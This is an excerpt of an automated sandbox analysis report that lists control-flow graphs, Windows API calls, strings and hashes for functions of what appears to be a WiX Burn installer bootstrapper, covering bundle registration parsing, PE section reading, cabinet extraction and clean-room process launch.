                                                                                                                                                                                                                                                                                                  control_flow_graph 0 86f9e3-86fa14 call 8a39af 3 86fa16 0->3 4 86fa18-86fa1a 0->4 3->4 5 86fa2e-86fa47 call 8a32f3 4->5 6 86fa1c-86fa29 call 8a0237 4->6 12 86fa53-86fa68 call 8a32f3 5->12 13 86fa49-86fa4e 5->13 11 86ff16-86ff1b 6->11 14 86ff23-86ff28 11->14 15 86ff1d-86ff1f 11->15 24 86fa74-86fa81 call 86ea42 12->24 25 86fa6a-86fa6f 12->25 16 86ff0d-86ff14 call 8a0237 13->16 18 86ff30-86ff35 14->18 19 86ff2a-86ff2c 14->19 15->14 30 86ff15 16->30 22 86ff37-86ff39 18->22 23 86ff3d-86ff41 18->23 19->18 22->23 27 86ff43-86ff46 call 8a5636 23->27 28 86ff4b-86ff52 23->28 33 86fa83-86fa88 24->33 34 86fa8d-86faa2 call 8a32f3 24->34 25->16 27->28 30->11 33->16 37 86faa4-86faa9 34->37 38 86faae-86fac0 call 8a4c97 34->38 37->16 41 86fac2-86faca 38->41 42 86facf-86fae4 call 8a32f3 38->42 43 86fd99-86fda2 call 8a0237 41->43 47 86fae6-86faeb 42->47 48 86faf0-86fb05 call 8a32f3 42->48 43->30 47->16 52 86fb07-86fb0c 48->52 53 86fb11-86fb23 call 8a3505 48->53 52->16 56 86fb25-86fb2a 53->56 57 86fb2f-86fb45 call 8a39af 53->57 56->16 60 86fdf4-86fe0e call 86ecbe 57->60 61 86fb4b-86fb4d 57->61 68 86fe10-86fe15 60->68 69 86fe1a-86fe32 call 8a39af 60->69 62 86fb4f-86fb54 61->62 63 86fb59-86fb6e call 8a3505 61->63 62->16 70 86fb70-86fb75 63->70 71 86fb7a-86fb8f call 8a32f3 63->71 68->16 75 86fefc-86fefd call 86f0f8 69->75 76 86fe38-86fe3a 69->76 70->16 78 86fb91-86fb93 71->78 79 86fb9f-86fbb4 call 8a32f3 71->79 86 86ff02-86ff06 75->86 80 86fe46-86fe64 call 8a32f3 76->80 81 86fe3c-86fe41 76->81 78->79 83 86fb95-86fb9a 78->83 90 86fbb6-86fbb8 79->90 91 86fbc4-86fbd9 call 8a32f3 79->91 92 86fe66-86fe6b 80->92 93 86fe70-86fe88 call 8a32f3 80->93 81->16 83->16 86->30 89 86ff08 86->89 89->16 90->91 94 86fbba-86fbbf 90->94 101 86fbdb-86fbdd 91->101 102 86fbe9-86fbfe call 8a32f3 91->102 92->16 99 86fe95-86fead call 8a32f3 93->99 100 86fe8a-86fe8c 93->100 94->16 109 86feaf-86feb1 99->109 110 86feba-86fed2 call 8a32f3 99->110 100->99 103 86fe8e-86fe93 100->103 101->102 104 86fbdf-86fbe4 101->104 111 86fc00-86fc02 102->111 112 86fc0e-86fc23 call 8a32f3 102->112 103->16 104->16 109->110 116 86feb3-86feb8 109->116 119 86fed4-86fed9 110->119 120 86fedb-86fef3 call 8a32f3 110->120 111->112 113 86fc04-86fc09 111->113 121 86fc25-86fc27 112->121 122 86fc33-86fc48 call 8a32f3 112->122 113->16 116->16 119->16 120->75 128 86fef5-86fefa 120->128 121->122 124 86fc29-86fc2e 121->124 129 86fc4a-86fc4c 122->129 130 86fc58-86fc6d call 8a32f3 122->130 124->16 128->16 129->130 131 86fc4e-86fc53 129->131 134 86fc6f-86fc71 130->134 135 86fc7d-86fc92 call 8a32f3 130->135 131->16 134->135 137 86fc73-86fc78 134->137 139 86fc94-86fc96 135->139 140 86fca2-86fcba call 8a32f3 135->140 137->16 139->140 141 86fc98-86fc9d 139->141 144 86fcbc-86fcbe 140->144 145 86fcca-86fce2 call 8a32f3 140->145 141->16 144->145 146 86fcc0-86fcc5 144->146 149 86fce4-86fce6 145->149 150 86fcf2-86fd07 call 8a32f3 145->150 146->16 149->150 152 86fce8-86fced 149->152 154 86fda7-86fda9 150->154 155 86fd0d-86fd2a CompareStringW 150->155 152->16 156 86fdb4-86fdb6 154->156 157 86fdab-86fdb2 154->157 158 86fd34-86fd49 CompareStringW 155->158 159 86fd2c-86fd32 155->159 160 86fdc2-86fdda call 8a3505 156->160 161 86fdb8-86fdbd 156->161 157->156 163 86fd57-86fd6c CompareStringW 158->163 164 86fd4b-86fd55 158->164 162 86fd75-86fd7a 159->162 160->60 170 86fddc-86fdde 160->170 161->16 162->156 166 86fd6e 163->166 167 86fd7c-86fd94 call 863821 163->167 164->162 166->162 167->43 172 86fde0-86fde5 170->172 173 86fdea 170->173 172->16 173->60
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                                                                                                                                                                  • String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$registration.cpp$yes
                                                                                                                                                                                                                                                                                                  • API String ID: 760788290-2956246334
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1b2420f4c4294cc1b3fa50242bb11fdeeaa3beeb5a606a8f72275362f4f43878
                                                                                                                                                                                                                                                                                                  • Instruction ID: e442ac44816c641c20307fbe0fa16788132935eea479cba0c6c356abe38acc30
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b2420f4c4294cc1b3fa50242bb11fdeeaa3beeb5a606a8f72275362f4f43878
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49E1D632E4463ABACF219664DC56EEEB6A5FB01710F120231FA21FA352DB65DD1097C1
                                                                                                                                                                                                                                                                                                  Function 0086B48B Relevance: 91.6, APIs: 24, Strings: 28, Instructions: 578fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 174 86b48b-86b500 call 88f8e0 * 2 179 86b502-86b50c GetLastError 174->179 180 86b538-86b53e 174->180 181 86b50e-86b517 179->181 182 86b519 179->182 183 86b542-86b554 SetFilePointerEx 180->183 184 86b540 180->184 181->182 185 86b520-86b52d call 863821 182->185 186 86b51b 182->186 187 86b556-86b560 GetLastError 183->187 188 86b588-86b5a2 ReadFile 183->188 184->183 204 86b532-86b533 185->204 186->185 192 86b562-86b56b 187->192 193 86b56d 187->193 189 86b5a4-86b5ae GetLastError 188->189 190 86b5d9-86b5e0 188->190 196 86b5b0-86b5b9 189->196 197 86b5bb 189->197 199 86b5e6-86b5ef 190->199 200 86bbd7-86bbeb call 863821 190->200 192->193 194 86b574-86b586 call 863821 193->194 195 86b56f 193->195 194->204 195->194 196->197 202 86b5c2-86b5d4 call 863821 197->202 203 86b5bd 197->203 199->200 206 86b5f5-86b605 SetFilePointerEx 199->206 218 86bbf0 200->218 202->204 203->202 209 86bbf1-86bbf7 call 8a0237 204->209 211 86b607-86b611 GetLastError 206->211 212 86b63c-86b654 ReadFile 206->212 227 86bbf8-86bc0a call 88e06f 209->227 213 86b613-86b61c 211->213 214 86b61e 211->214 215 86b656-86b660 GetLastError 212->215 216 86b68b-86b692 212->216 213->214 223 86b625-86b632 call 863821 214->223 224 86b620 214->224 225 86b662-86b66b 215->225 226 86b66d 215->226 221 86bbbc-86bbd5 call 863821 216->221 222 86b698-86b6a2 216->222 218->209 221->218 222->221 228 86b6a8-86b6cb SetFilePointerEx 222->228 223->212 224->223 225->226 231 86b674-86b681 call 863821 226->231 232 86b66f 226->232 234 86b702-86b71a ReadFile 228->234 235 86b6cd-86b6d7 GetLastError 228->235 231->216 232->231 242 86b751-86b769 ReadFile 234->242 243 86b71c-86b726 GetLastError 234->243 240 86b6e4 235->240 241 86b6d9-86b6e2 235->241 247 86b6e6 240->247 248 86b6eb-86b6f8 call 863821 240->248 241->240 245 86b7a0-86b7bb SetFilePointerEx 242->245 246 86b76b-86b775 GetLastError 242->246 249 86b733 243->249 250 86b728-86b731 243->250 254 86b7f5-86b814 ReadFile 245->254 255 86b7bd-86b7c7 GetLastError 245->255 251 86b777-86b780 246->251 252 86b782 246->252 247->248 248->234 256 86b735 249->256 257 86b73a-86b747 call 863821 249->257 250->249 251->252 261 86b784 252->261 262 86b789-86b796 call 863821 252->262 259 86bb7d-86bb87 GetLastError 254->259 260 86b81a-86b81c 254->260 264 86b7d4 255->264 265 86b7c9-86b7d2 255->265 256->257 257->242 271 86bb94 259->271 272 86bb89-86bb92 259->272 269 86b81d-86b824 260->269 261->262 262->245 266 86b7d6 264->266 267 86b7db-86b7eb call 863821 264->267 265->264 266->267 267->254 276 86b82a-86b836 269->276 277 86bb58-86bb75 call 863821 269->277 273 86bb96 271->273 274 86bb9b-86bbb1 call 863821 271->274 272->271 273->274 289 86bbb2-86bbba call 8a0237 274->289 281 86b841-86b84a 276->281 282 86b838-86b83f 276->282 290 86bb7a-86bb7b 277->290 287 86b850-86b876 ReadFile 281->287 288 86bb1b-86bb32 call 863821 281->288 282->281 285 86b884-86b88b 282->285 292 86b8b4-86b8cb call 86394f 285->292 293 86b88d-86b8af call 863821 285->293 287->259 291 86b87c-86b882 287->291 300 86bb37-86bb3d call 8a0237 288->300 289->227 290->289 291->269 304 86b8ef-86b904 SetFilePointerEx 292->304 305 86b8cd-86b8ea call 863821 292->305 293->290 310 86bb43-86bb44 300->310 308 86b906-86b910 GetLastError 304->308 309 86b944-86b969 ReadFile 304->309 305->209 314 86b912-86b91b 308->314 315 86b91d 308->315 311 86b9a0-86b9ac 309->311 312 86b96b-86b975 GetLastError 309->312 316 86bb45-86bb47 310->316 319 86b9ae-86b9ca call 863821 311->319 320 86b9cf-86b9d3 311->320 317 86b977-86b980 312->317 318 86b982 312->318 314->315 321 86b924-86b934 call 863821 315->321 322 86b91f 315->322 316->227 325 86bb4d-86bb53 call 863a16 316->325 317->318 326 86b984 318->326 327 86b989-86b99e call 863821 318->327 319->300 323 86b9d5-86ba09 call 863821 call 8a0237 320->323 324 86ba0e-86ba21 call 8a4a05 320->324 336 86b939-86b93f call 8a0237 321->336 322->321 323->316 343 86ba23-86ba28 324->343 344 86ba2d-86ba37 324->344 325->227 326->327 327->336 336->310 343->336 347 86ba41-86ba49 344->347 348 86ba39-86ba3f 344->348 350 86ba55-86ba58 347->350 351 86ba4b-86ba53 347->351 349 86ba5a-86baba call 86394f 348->349 354 86bade-86baff call 88f360 call 86b208 349->354 355 86babc-86bad8 call 863821 349->355 350->349 351->349 354->316 362 86bb01-86bb11 call 863821 354->362 355->354 362->288
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,7774C3F0,00000000), ref: 0086B502
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B550
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,7774C3F0,00000000), ref: 0086B556
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNELBASE(00000000,00864461,00000040,?,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B59E
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,7774C3F0,00000000), ref: 0086B5A4
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B601
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B607
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B650
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B656
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B6C7
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B6CD
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B716
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B71C
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B765
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B76B
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B7B7
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B7BD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B810
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B872
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B8FC
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B906
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
                                                                                                                                                                                                                                                                                                  • String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$burn$section.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3411815225-695169583
                                                                                                                                                                                                                                                                                                  • Opcode ID: d611743fb9b97a3c084a194db3cc7d45458e5e629aba0c61c9976928c5dde31c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 368e8441d3389abe4962d5c76bba42eca6fc3dfb277bc23bb82c0a3327b40fae
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d611743fb9b97a3c084a194db3cc7d45458e5e629aba0c61c9976928c5dde31c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7612F672940235ABEB309A54CC46FAA7AA4FF05724F0241A5FE14FB381E7759D80CBE1
                                                                                                                                                                                                                                                                                                  Function 00880D16 Relevance: 54.6, APIs: 20, Strings: 11, Instructions: 306synchronizationCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 365 880d16-880d2d SetEvent 366 880d6f-880d7d WaitForSingleObject 365->366 367 880d2f-880d39 GetLastError 365->367 370 880d7f-880d89 GetLastError 366->370 371 880db4-880dbf ResetEvent 366->371 368 880d3b-880d44 367->368 369 880d46 367->369 368->369 372 880d48 369->372 373 880d4d-880d5d call 863821 369->373 376 880d8b-880d94 370->376 377 880d96 370->377 374 880df9-880dff 371->374 375 880dc1-880dcb GetLastError 371->375 372->373 395 880d62-880d6a call 8a0237 373->395 381 880e01-880e04 374->381 382 880e32-880e4b call 8621ac 374->382 378 880dd8 375->378 379 880dcd-880dd6 375->379 376->377 383 880d98 377->383 384 880d9d-880db2 call 863821 377->384 387 880dda 378->387 388 880ddf-880df4 call 863821 378->388 379->378 390 880e28-880e2d 381->390 391 880e06-880e23 call 863821 381->391 398 880e4d-880e5e call 8a0237 382->398 399 880e63-880e6e SetEvent 382->399 383->384 384->395 387->388 388->395 392 8810e8-8810ed 390->392 405 8810de-8810e4 call 8a0237 391->405 400 8810ef 392->400 401 8810f2-8810f8 392->401 395->392 419 8810e5-8810e7 398->419 407 880ea8-880eb6 WaitForSingleObject 399->407 408 880e70-880e7a GetLastError 399->408 400->401 405->419 410 880eb8-880ec2 GetLastError 407->410 411 880ef0-880efb ResetEvent 407->411 414 880e7c-880e85 408->414 415 880e87 408->415 416 880ecf 410->416 417 880ec4-880ecd 410->417 420 880efd-880f07 GetLastError 411->420 421 880f35-880f3c 411->421 414->415 422 880e89 415->422 423 880e8e-880ea3 call 863821 415->423 426 880ed1 416->426 427 880ed6-880eeb call 863821 416->427 417->416 419->392 428 880f09-880f12 420->428 429 880f14 420->429 424 880fab-880fce CreateFileW 421->424 425 880f3e-880f41 421->425 422->423 448 8810dd 423->448 437 88100b-88101f SetFilePointerEx 424->437 438 880fd0-880fda GetLastError 424->438 431 880f6e-880f72 call 86394f 425->431 432 880f43-880f46 425->432 426->427 427->448 428->429 434 880f1b-880f30 call 863821 429->434 435 880f16 429->435 455 880f77-880f7c 431->455 441 880f48-880f4b 432->441 442 880f67-880f69 432->442 434->448 435->434 445 881059-881064 SetEndOfFile 437->445 446 881021-88102b GetLastError 437->446 439 880fdc-880fe5 438->439 440 880fe7 438->440 439->440 451 880fe9 440->451 452 880fee-881001 call 863821 440->452 453 880f5d-880f62 441->453 454 880f4d-880f53 441->454 442->392 449 88109b-8810a8 SetFilePointerEx 445->449 450 881066-881070 GetLastError 445->450 456 881038 446->456 457 88102d-881036 446->457 448->405 449->419 462 8810aa-8810b4 GetLastError 449->462 459 88107d 450->459 460 881072-88107b 450->460 451->452 452->437 453->419 454->453 463 880f9d-880fa6 455->463 464 880f7e-880f98 call 863821 455->464 465 88103a 456->465 466 88103f-881054 call 863821 456->466 457->456 467 88107f 459->467 468 881084-881099 call 863821 459->468 460->459 470 8810c1 462->470 471 8810b6-8810bf 462->471 463->419 464->448 465->466 466->448 467->468 468->448 475 8810c8-8810d8 call 863821 470->475 476 8810c3 470->476 471->470 475->448 476->475
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,008808BC,?,?), ref: 00880D25
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,008808BC,?,?), ref: 00880D2F
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,008808BC,?,?), ref: 00880D74
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,008808BC,?,?), ref: 00880D7F
                                                                                                                                                                                                                                                                                                  • ResetEvent.KERNEL32(?,?,?,?,?,008808BC,?,?), ref: 00880DB7
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,008808BC,?,?), ref: 00880DC1
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$Event$ObjectResetSingleWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1865021742-2104912459
                                                                                                                                                                                                                                                                                                  • Opcode ID: 277b0997e455100cc5942a1fa919ea5b5c5a362dedbe2d4aa9159ab291b2cf76
                                                                                                                                                                                                                                                                                                  • Instruction ID: be81dddf4ce2f32931b2dc0a7a4c43c8ba63bdc05bae4be938df3dae8325f5cd
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 277b0997e455100cc5942a1fa919ea5b5c5a362dedbe2d4aa9159ab291b2cf76
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45912A37A80A36B7E73526A94D4EB5A2954FF01B21F124221BE20FF7D1DB55DC009BD2
                                                                                                                                                                                                                                                                                                  Function 00864D39 Relevance: 38.7, APIs: 6, Strings: 16, Instructions: 220COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 742 864d39-864d81 call 88f8e0 call 8633c7 747 864d95-864d9f call 8798f7 742->747 748 864d83-864d90 call 8a0237 742->748 754 864da1-864da6 747->754 755 864da8-864db7 call 8798fd 747->755 753 864f31-864f3b 748->753 756 864f46-864f4a 753->756 757 864f3d-864f42 CloseHandle 753->757 758 864ddd-864df8 call 861f13 754->758 763 864dbc-864dc0 755->763 761 864f55-864f59 756->761 762 864f4c-864f51 CloseHandle 756->762 757->756 769 864e01-864e15 call 876a57 758->769 770 864dfa-864dff 758->770 765 864f64-864f66 761->765 766 864f5b-864f60 CloseHandle 761->766 762->761 767 864dd7-864dda 763->767 768 864dc2 763->768 772 864f6b-864f7f call 862782 * 2 765->772 773 864f68-864f69 CloseHandle 765->773 766->765 767->758 771 864dc7-864dd2 call 8a0237 768->771 781 864e17 769->781 782 864e2f-864e43 call 876b13 769->782 770->771 771->753 786 864f81-864f84 call 8a5636 772->786 787 864f89-864f8d 772->787 773->772 784 864e1c 781->784 790 864e45-864e4a 782->790 791 864e4c-864e67 call 861f55 782->791 788 864e21-864e2a call 8a0237 784->788 786->787 793 864f97-864f9f 787->793 794 864f8f-864f92 call 8a5636 787->794 800 864f2e 788->800 790->784 801 864e73-864e8c call 861f55 791->801 802 864e69-864e6e 791->802 794->793 800->753 805 864e8e-864e93 801->805 806 864e98-864ec4 CreateProcessW 801->806 802->771 805->771 807 864ec6-864ed0 GetLastError 806->807 808 864f01-864f17 call 8a0a28 806->808 810 864ed2-864edb 807->810 811 864edd 807->811 812 864f1c-864f20 808->812 810->811 813 864ee4-864efc call 863821 811->813 814 864edf 811->814 812->753 815 864f22-864f29 call 8a0237 812->815 813->788 814->813 815->800
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008633C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,008610DD,?,00000000), ref: 008633E8
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00864F40
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00864F4F
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00864F5E
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00864F69
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to append %ls, xrefs: 00864E1C
                                                                                                                                                                                                                                                                                                  • burn.filehandle.attached, xrefs: 00864E17
                                                                                                                                                                                                                                                                                                  • %ls %ls, xrefs: 00864E55
                                                                                                                                                                                                                                                                                                  • D, xrefs: 00864EA9
                                                                                                                                                                                                                                                                                                  • Failed to wait for clean room process: %ls, xrefs: 00864F23
                                                                                                                                                                                                                                                                                                  • burn.filehandle.self, xrefs: 00864E45
                                                                                                                                                                                                                                                                                                  • -%ls="%ls", xrefs: 00864DE6
                                                                                                                                                                                                                                                                                                  • Failed to get path for current process., xrefs: 00864D83
                                                                                                                                                                                                                                                                                                  • Failed to allocate parameters for unelevated process., xrefs: 00864DFA
                                                                                                                                                                                                                                                                                                  • Failed to allocate full command-line., xrefs: 00864E8E
                                                                                                                                                                                                                                                                                                  • engine.cpp, xrefs: 00864EEA
                                                                                                                                                                                                                                                                                                  • Failed to cache to clean room., xrefs: 00864DC2
                                                                                                                                                                                                                                                                                                  • burn.clean.room, xrefs: 00864DDE
                                                                                                                                                                                                                                                                                                  • Failed to launch clean room process: %ls, xrefs: 00864EF7
                                                                                                                                                                                                                                                                                                  • Failed to append original command line., xrefs: 00864E69
                                                                                                                                                                                                                                                                                                  • "%ls" %ls, xrefs: 00864E7A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
